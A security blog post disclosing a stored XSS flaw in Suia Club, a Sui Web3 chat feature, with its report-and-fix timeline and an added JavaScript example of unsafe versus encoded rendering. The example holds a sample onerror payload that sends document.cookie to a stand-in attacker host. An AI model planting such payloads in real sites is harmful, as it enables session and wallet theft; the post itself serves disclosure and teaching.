An XSS Vulnerability on a Sui Web3 Social Application called Suia has been Found and Fixed.

kriss_
5 min read · Mar 22, 2024
An XSS vulnerability on Suia has been found and fixed.

kriss_, the Founder of Scallop, uncovered a critical XSS vulnerability within Suia, a prominent Sui-based Web3 Social Application. Upon his discovery, kriss_ promptly reported the issue to the Suia team, which verified the vulnerability and implemented a fix at commendable speed.

What is Suia?

Suia

Suia is a Web3 social application on the Sui Network, backed by entities including the Sui Foundation, HashKey, SevenX, EVG, BingX, and Y2Z. It provides features like creating Sui NFTs and facilitating on-chain NFT gifting and auction activities. The project’s token symbol is SUIA, and it has recently introduced social features like Social Coin and Club.

Suia Users

Suia’s user base includes the co-founders of Mysten Labs, key opinion leaders, and retail users across the Sui ecosystem, which makes it a significant application within this network.

What is Suia Club?

Co-founder of Mysten Labs — Evan Cheng’s Suia Club page

On February 7th, Suia launched its Club feature. A Club is a chat room in which users must hold the platform’s native Social Coin to participate, according to the details Suia shared on its platform and to user discussions.

Because the Club is built on the Sui Network, every message is stored on-chain, which offers transparency and immutability. Users can send and delete messages and use zkSend to transfer $SUI, the Sui Network’s native coin.

The feature supports multiple languages and emojis to enhance the user experience. This initiative is part of Suia’s broader effort to integrate social interaction with blockchain technology, providing a space where users’ interactions are permanently recorded on the blockchain.

What is XSS?

Cross-Site Scripting (XSS) attacks are an injection type in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally as a browser-side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

XSS Logic (Picture from cloudflare.com)

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser cannot know that the script should not be trusted, so it will execute it. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

What happened?

The Suia Club’s message-sending feature lets users post text strings to the blockchain. Suia’s front end retrieves those strings and renders them in the visitor’s browser.

In a traditional Web2 stack, data read back from the database does not reach the page raw: the framework’s templating layer normally checks format and length and, above all, encodes the string for the context it is rendered in, so a stored “<script>” or “<img onerror>” is displayed as text rather than interpreted as markup.

That output-encoding step was missing from the design of Suia’s native Club feature. A malicious user could therefore write an XSS payload to the Sui Network as an ordinary message, and every visitor’s browser would interpret it as HTML when the front end rendered that message: a stored XSS that hits everyone who opens the page.
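The following is an added example, not Suia’s code and not the page author’s: it reconstructs the class of bug described in the “What is XSS?” and “What happened?” sections in a few lines of JavaScript. The Club message is a constructed sample modelled on the “<img>” test in the post, the function names and the host name attacker.invalid are assumptions for illustration, and the payload is a harmless string that is never executed here; the point is the difference between interpolating an on-chain string into markup and encoding it for the HTML text context.

```javascript
// Added example (not Suia's code): a message fetched from chain becomes
// stored XSS when the front end interpolates it into HTML, and the two
// fixes a reviewer would ask for. Runs under Node or a browser.

// Constructed sample of what an attacker could store on-chain as a Club
// message (hypothetical payload; the host name is a reserved .invalid TLD).
const ATTACKER_MESSAGE =
  '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">';
const BENIGN_MESSAGE = 'gm <3 & welcome to the club';

// Vulnerable rendering: the untrusted string is concatenated straight into
// markup that will be handed to innerHTML (or a framework's raw-HTML sink).
// The browser parses the <img> tag and fires its onerror handler.
function renderMessageUnsafe(sender, text) {
  return `<div class="msg"><b>${sender}</b>: ${text}</div>`;
}

// Fix 1: contextual output encoding for the HTML text context. Every
// character that can open a tag, close an attribute, or start an entity is
// replaced, so the payload is shown literally instead of being parsed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderMessageSafe(sender, text) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(text)}</div>`;
}

// Fix 2 (preferred when you own the DOM): never build markup from strings at
// all. Create nodes and assign the untrusted string to textContent, which
// cannot introduce elements. Browser-only; it is only defined here so the
// module still loads under Node without a DOM.
function appendMessageToDom(container, sender, text) {
  const div = document.createElement('div');
  div.className = 'msg';
  const b = document.createElement('b');
  b.textContent = sender;            // untrusted, but text only
  div.appendChild(b);
  div.appendChild(document.createTextNode(': ' + text)); // untrusted, text only
  container.appendChild(div);
  return div;
}

// Quick self-check when run directly: the unsafe render still contains a
// live <img> tag, the safe one contains only the encoded form.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderMessageUnsafe('mallory', ATTACKER_MESSAGE));
  console.log(renderMessageSafe('mallory', ATTACKER_MESSAGE));
  console.log(renderMessageSafe('alice', BENIGN_MESSAGE));
}

module.exports = { ATTACKER_MESSAGE, BENIGN_MESSAGE, renderMessageUnsafe, escapeHtml, renderMessageSafe, appendMessageToDom };
```

Encoding has to match the sink: escapeHtml is correct for element text and for quoted attribute values, but a string dropped into a URL, a script block, or an unquoted attribute needs that context’s encoder instead. A Content-Security-Policy without ’unsafe-inline’ for script-src is worth adding as defence in depth, since it blocks inline event handlers such as the onerror above even if an encoding step is missed, but it is not a substitute for the fix.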

The following picture is kriss_’s Suia Club with the test XSS payload executing: the browser has interpreted the injected “<img>” tag as markup and shows it as a broken image.

The browser executed the testing code

We further let the client browser execute the JavaScript code fetched from the blockchain.

The browser executed the testing code (Developers Mode)

This transaction simulates a real attacker sending an XSS payload. Because the payload runs as script within the Suia page’s origin, it can run ANY JavaScript on the visitor’s client side.

A Sui Txn which sent an XSS payload.
The XSS callback shown on the XSS platform.

Timeline (UTC+8)

2024/02/07 3:08 PM — Suia Club Public Test
2024/03/01 9:03 AM — kriss_ was using Suia Club and noticed something suspicious.
2024/03/01 9:13 AM — kriss_ confirmed an XSS bug in Suia Club.
2024/03/01 9:19 AM — kriss_ tried to contact the Suia team.
2024/03/01 9:23 AM — kriss_ reached the Suia team and reported the bug.
2024/03/01 9:58 AM — The Suia team fixed the bug.

Conclusion

kriss_

Cross-Site Scripting (XSS) vulnerabilities are a serious threat to Web3 social applications, especially where cryptocurrency transactions are routine. The XSS issue in Suia Club could have been used to steal session cookies and any secrets the page keeps in browser storage, to inject fake wallet prompts that phish for private keys or seed phrases, and to manipulate the transactions users are asked to sign, putting user assets and platform integrity at considerable risk.

We commend the Suia team for their swift response in confirming and fixing this vulnerability, and hope all project teams are aware of, and protected against, attack vectors that bridge Web2 and Web3: data read from the chain is user input too, and it needs the same output encoding as anything read from a database. Users should also raise their own security awareness, verify the legitimacy of the applications they use and the transactions they sign, and weigh their risk tolerance before engaging with Web3 applications.

Sincerely,

kriss_

Founder of Scallop, Security Eng. & DJ.
